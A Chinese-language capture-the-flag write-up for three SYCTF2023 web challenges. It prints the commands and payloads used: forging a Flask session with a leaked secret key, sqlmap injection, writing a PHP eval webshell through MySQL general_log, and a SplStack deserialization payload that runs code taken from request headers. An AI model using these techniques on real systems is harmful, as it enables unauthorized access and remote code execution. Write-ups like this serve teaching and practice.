SYCTF2023 WEB writeup

CarelessPy

一进来是个图片还能下载，查看源码，给了两个路由

一个/eval一个/login

来到/eval路由显示了好多文件

尝试让他吐出flag发现不行

读取/app/__pycache__目录下有个part.cpython-311.pyc

尝试download

后面读取到了part.cpython-36.pyc

app/pycache/part.cpython-36.pyc

里面有session_KEY

import os
import random
import hashlib
from flask import *
from lxml import etree
app = Flask(__name__)
app.config['SECRET_KEY'] = 'o2takuXX_donot_like_ntr'

o2takuXX_donot_like_ntr

session伪造

1 2	python3 flask_session_cookie_manager3.py decode -s 'o2takuXX_donot_like_ntr' -c 'eyJpc2xvZ2luIjpmYWxzZX0.ZX_j3Q.TOsx3z2TlcD6FTPFPB_QW9gtN_k' {'islogin': False}

1
2
3

 python3 flask_session_cookie_manager3.py encode -s 'o2takuXX_donot_like_ntr' -t
 "{'islogin': True}"
eyJpc2xvZ2luIjp0cnVlfQ.ZX_qtA._K8B3zkOdAJGN4sxuHtMWuqhNDQ

替换后

最后是个xxe明明是相同的payload，可我的就是不出

呜呜呜

Confronting robot

盲猜sql注入

sqlmap跑出第一步

python3 sqlmap.py -u http://47.108.206.43:27623/?myname=11111 -D robot_data -T name -columns -dump -batch

访问 “/sEcR@t_n@Bodyknow.php“ 发现几个可用页面

传输 POST 传code

开始挑战, 跳到game.php, 随便填几个RPS, 发现会跟 NULL 比值


Shell

Notice:  Trying to access array offset on value of type null in /var/www/html/game.php on line 31

Notice:  Trying to access array offset on value of type null in /var/www/html/game.php on line 31

Notice:  Trying to access array offset on value of type null in /var/www/html/game.php on line 31

Notice:  Trying to access array offset on value of type null in /var/www/html/game.php on line 31

Notice:  Trying to access array offset on value of type null in /var/www/html/game.php on line 31

Notice:  Trying to access array offset on value of type null in /var/www/html/game.php on line 31

Notice:  Trying to access array offset on value of type null in /var/www/html/game.php on line 31

Notice:  Trying to access array offset on value of type null in /var/www/html/game.php on line 31

Notice:  Trying to access array offset on value of type null in /var/www/html/game.php on line 31

Notice:  Trying to access array offset on value of type null in /var/www/html/game.php on line 31

Fatal error:  Uncaught TypeError: Argument 2 passed to  loseorwin() must be of the type string, null given, called in  /var/www/html/game.php on line 38 and defined in  /var/www/html/game.php:11 Stack trace: #0 /var/www/html/game.php(38): loseorwin('R', NULL) #1 {main}   thrown in /var/www/html/game.php on line 11

“/sEcR@t_n@Bodyknow.php“ 传空参可以得到两个函数 “mysqli_query()” 和 “mysqli_fetch_all()”, 试着写马传了一下, 然后sql日志写马

show global variables like “%general%”

试着写马

1	Shell set global general_log='on' set global general_log_file='/var/www/html/shell.php' select '<?php eval($_REQUEST['cmd']);?>'

发现没有权限去写

可以在本页面写

1	set global general_log='on'

1	set global general_log_file='/var/www/html//sEcR@t_n@Bodyknow.php'

1	select '<?php eval($_REQUEST['cmd']);?>'

蚁剑链接在game。php有flag

4号的罗纳尔多

<?php
error_reporting(0);
highlight_file(__FILE__);
class evil{
    public $cmd;
    public $a;
    public function __destruct(){
        if('VanZZZZY' === preg_replace('/;+/','VanZZZZY',preg_replace('/[A-Za-z_\(\)]+/','',$this->cmd))){
            eval($this->cmd.'givemegirlfriend!');
        } else {
            echo 'nonono';
        }
    }
}

if(!preg_match('/^[Oa]:[\d]+|Array|Iterator|Object|List/i',$_GET['Pochy'])){
    unserialize($_GET['Pochy']);
} else {
    echo 'nonono';
}

很经典不能O,a开头，那我们就C开头，不能有ArrayObject，啧，之前ctfshow学到的没用了，最终发现SplStack这个类也能用，然后就是绕__destruct，也就是只能使用[A-Za-z_]，最后带个; 怎么把givemegirlfriend! 除掉是个问题，__halt_compiler(); 可以中断编译器的执行，不让eval解析后面的就行了，这里没法用引号，所以得构造无参rce，exp如下：

<?php
class evil
{
    public $cmd="eval(end(getallheaders()));__halt_compiler();";
}
$a=new SplStack();
$a->push(new evil());
$b=serialize($a);
echo($b);

// 注意得修改成符合C的格式，具体可以自己查资料
// C:8:"SplStack":84:{i:0;:O:4:"evil":1:{s:3:"cmd";s:45:"eval(end(getallheaders()));__halt_compiler();";};}